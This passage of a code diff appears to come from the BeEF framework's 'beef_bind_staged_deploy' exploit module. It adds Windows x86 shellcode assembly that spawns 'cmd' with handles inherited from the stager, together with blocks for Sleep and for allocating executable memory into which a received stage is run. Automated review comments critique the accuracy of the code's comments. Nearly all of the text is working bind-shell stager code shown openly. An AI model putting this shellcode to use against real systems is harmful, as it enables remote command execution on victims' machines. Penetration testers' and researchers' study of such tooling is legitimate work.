+ push dword [esp+20] ; child stdout write file descriptor for process stdout
+ push dword [esp+12] ; child stdin read file descriptor for process stdout
+ xor esi, esi ; Clear ESI for all the NULL's we need to push
+ push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
+ pop ecx ; Set ECX for the loop
+push_loop: ;
+ push esi ; push a null dword
+ loop push_loop ; keep looping untill we have pushed enough nulls
+ mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
+ lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
+ mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
+ ; perform the call to CreateProcessA
+ push esp ; Push the pointer to the PROCESS_INFORMATION Structure
+ push eax ; Push the pointer to the STARTUPINFO Structure
+ push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
+ push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
+ push esi ; We dont specify any dwCreationFlags
+ inc esi ; Increment ESI to
be one
+ push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
+ dec esi ; Decrement ESI back down to zero
+ push esi ; Set lpThreadAttributes to NULL
+ push esi ; Set lpProcessAttributes to NULL
+ push ebx ; Set the lpCommandLine to point to "cmd",0
+ push esi ; Set lpApplicationName to NULL as we are using the command line param instead
+ push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
+ call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
+ ; perform the call to WaitForSingleObject
+; mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure
+; dec esi ; Decrement ESI down to -1 (INFINITE)
+; push esi ; push INFINITE inorder to wait forever
+; inc esi ; Increment ESI back to zero
+; push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess
+; push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
+; call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm
new file mode 100644
index 000000000..4d3b57ce2
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm
@@ -0,0 +1,15 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: None
+; Output: None. Sleeps for specified seconds.
+; Clobbers: None
+
+ push 1000 ; milliseconds
+ push 0xE035F044 ; hash (kernel32.dll, Sleep)
+ call ebp ; Sleep(1000ms)
+
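Review bot: The comment on `push dword [esp+12]` says "child stdin read file descriptor for process stdout", but the header table documents that slot as the child's stdin and it occupies the hStdInput position, so it should read `; child stdin read file descriptor for process stdin`. The seven commented-out WaitForSingleObject lines at the end of the block are dead code; either delete them or replace them with a single comment stating why the parent deliberately does not wait on the child (presumably because the including stage's read loop handles the child's output — confirm). Comment typos worth fixing while here: "inheritable all possible handle" → "inherit all inheritable handles", "enviroment", "untill", "inorder".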
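Review bot: The header says "Sleeps for specified seconds" but the block takes no input and sleeps a fixed 1000 ms, and the include-site comment in the stage repeats the mismatch ("Sleeps for x seconds"); the header should match the code, `; Output: None. Sleeps for a fixed 1000 ms.` "Clobbers: None" is also doubtful: Sleep is reached through api_call like every other API here, and the x86 caller-saved registers (EAX, ECX, EDX) are not guaranteed to survive a stdcall, so the clobber line should be verified against block_api's contract rather than stated as None.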
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm
new file mode 100644
index 000000000..f12b2f17c
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: None
+; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
+; Clobbers: EAX, EBX, ECX, EDX
+
+ mov ebx,0x1000 ; setup our flags and buffer size in ebx
+allocate_memory: ; Alloc a buffer for the request and response data
+ push byte 0x40 ; PAGE_EXECUTE_READWRITE - don't need execute but may as well
+ push ebx ; MEM_COMMIT
+ push ebx ; size of memory to be allocated (4096 bytes)
+ push byte 0 ; NULL as we dont care where the allocation is
+ push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
+ call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
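Review bot: The comment on `push byte 0x40` ("don't need execute but may as well") is inaccurate for this change: the stager that includes this block ends with `jmp esi` into the buffer returned here, so executable memory is a requirement, not an afterthought; `; PAGE_EXECUTE_READWRITE - the stage received into this buffer is executed in place`. The two `push ebx` lines depend on 0x1000 being both the MEM_COMMIT flag and the allocation size, which only the `mov ebx,0x1000` comment hints at; the first push should say so explicitly, `; MEM_COMMIT (0x1000 - same value as the buffer size, hence ebx twice)`. The header also says "Input: None" although the block, like the others, requires EBP to be api_call.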